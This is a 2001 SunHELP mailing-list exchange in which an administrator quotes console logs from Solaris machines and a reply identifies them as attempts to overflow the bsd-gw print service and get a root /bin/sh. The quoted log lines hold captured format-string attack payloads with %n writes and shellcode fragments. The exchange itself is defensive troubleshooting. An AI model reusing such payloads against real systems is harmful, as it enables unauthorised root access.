[SunHELP] bsd-gw[910]: Invalid protocol request (66)
Dale Ghent
sunhelp at sunhelp.org
Wed Apr 4 18:26:08 CDT 2001
On Wed, 4 Apr 2001, bruce beaudoin wrote:
| Hi, several hundred of these console messages (per computer) showed up
| on about half (7)
| of our Solaris2.6 & 2.7 machines last night. Not all were at the same time
| and it appears that the string echoed changes for each instance.
|
| Any ideas.
| Thanks,
| Bruce Beaudoin
|
| Apr 4 00:27:11 pic bsd-gw[9108]: Invalid protocol request (66):
| BBBXXXXXXXXXXXXXXXXXX%.72u%300$n%.106u%301$nsecurit%302$n%.1
| 92u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
| Apr 4 00:27:11 pic bsd-gw[9109]: Invalid protocol request (66):
| BBBXXXXXXXXXXXXXXXXXX%.168u%300$nsecurity.%301$nsecurity%302
| $n%.192u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
Looks like an attempt to buffer-overflow the bsd-gw process on your server
and gain a /bin/sh shell with the permissions of the user bsd-gw runs
under (probably root).
/dale
More information about the SunHELP
mailing list